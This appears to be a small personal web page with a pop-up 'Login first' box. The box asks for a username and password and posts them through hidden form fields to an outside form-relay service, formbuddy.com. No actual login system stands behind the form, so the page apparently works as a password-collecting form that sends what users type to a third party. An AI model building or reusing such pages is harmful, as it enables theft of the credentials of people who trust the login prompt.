<!DOCTYPE html>
<html>
<head>
    <title>clarisha octa?</title>
        <link rel="icon" href="fav_icon.jpg" type="image/x-icon">

    <script>
        window.onload = function(){
            document.getElementById("btn_showlogin").onclick = shogMinLogin;
            document.getElementById("close_minilogin").onclick = closeLogin;
            document.getElementById("firstLine").onmousedown = moveLogin;
            /* cl4r15h4*/
            function shogMinLogin(){
                var mini_login = document.getElementsByClassName("mini_login")[0];
                var cover = document.getElementsByClassName("cover")[0];
                mini_login.style.display = "block";
                cover.style.display = "block";

                mini_login.style.left = (document.body.scrollWidth - mini_login.scrollWidth) / 2 + "px";
                mini_login.style.top = (document.body.scrollHeight - mini_login.scrollHeight) / 2 + "px";
            }

            /* get close login */
            function closeLogin(){
                var mini_login = document.getElementsByClassName("mini_login")[0];
                var cover = document.getElementsByClassName("cover")[0];
                mini_login.style.display = "none";
                cover.style.display = "none";
            }

            /* redirect login */
            function moveLogin(event){
                var moveable = true;

                //mouse down
                event = event ? event : window.event;
                var clientX = event.clientX;
                var clientY = event.clientY;

                var mini_login = document.getElementById("mini_login");
                console.log(mini_login);
                var top = parseInt(mini_login.style.top);
                var left = parseInt(mini_login.style.left);//test
                document.onmousemove = function(event){
                    if(moveable){
                        event = event ? event : window.event;
                        var y = top + event.clientY - clientY;
                        var x = left + event.clientX - clientX;
                        if(x>0 && y>0){
                            mini_login.style.top = y + "px";
                            mini_login.style.left = x + "px";
                        }
                    }
                }
                //up mouse
                document.onmouseup = function(){
                    moveable = false;
                }
            }
        };
    </script>

    <style>
        /* mini login */
        .mini_login{
            display:none;
            position:absolute;
            z-index:2;
            background:white;
        }
        .mini_login .item{
            width:320px;
            margin:0 auto;
            height:48px;
            line-height:48px;
            padding:0 20px;
        }
        /* Login first */
        .mini_login .firstLine{
            color:#666;
            background:#f7f7f7;
            font-size:18px;
            font-weight:bold;
            cursor:move;
        }
        .mini_login .item .login_close{
            display:inline-block;
            float:right;
            cursor:pointer;
        }

        .mini_login .item label{
            font-size:14px;
            margin-right:15px;
        }
        .mini_login .item input{
            display:inline-block;
            height:60%;
            width:70%;
        }
        /* Login button  */
        .mini_login .item a.btn_login{
            display:block;
            margin:10px 10% 0;
            height:30px;
            line-height:30px;
            width:80%;
            background:#4490F7;
            color:white;
            font-size:16px;
            font-weight:bold;
            text-align:center;
        }
        /* cover */
        .cover{
            display:none;
            width:100%;
            height:100%;
            position:absolute;
            top:0;
            left:0;
            z-index:1;
            background-color:#000;
            opacity:0.3;
        }
    </style>
</head>
<body background="clarisha.jpg">

<!-- created by clarisha octa -->
<div class="main">
    <a href="javascript:void(0)" class="btn_login" id="btn_showlogin">Login first</a>
</div>

<!-- mini Login -->
<div class="mini_login" id="mini_login">
    <!-- 19367817262672274362288873 -->
    <form action="http://www.formbuddy.com/cgi-bin/formdisp.pl?u=octa&f=Prosesin" method="post">
<input type="hidden" name="username" value="octa">
<input type="hidden" name="reqd" value="0">
<input type="hidden" name="url" value="https://clarisha.github.io">

        <div class="item firstLine" id="firstLine">
            <span class="login_title">Login first</span>
            <span class="login_close" id="close_minilogin">X</span>
        </div>
        <div class="item">
            <label>username</label>
            <input type="text" name="uname" />
        </div>
        <div class="item">
            <label>password</label>
            <input type="password" name="upwd" />
        </div>
        <div class="item">
            <a href="javascript:void(0)" class="btn_login" onclick="submit">Login</a>
        </div>
    </form>
</div>
<!-- project github io -->
<div class="cover"></div>

</body>
</html>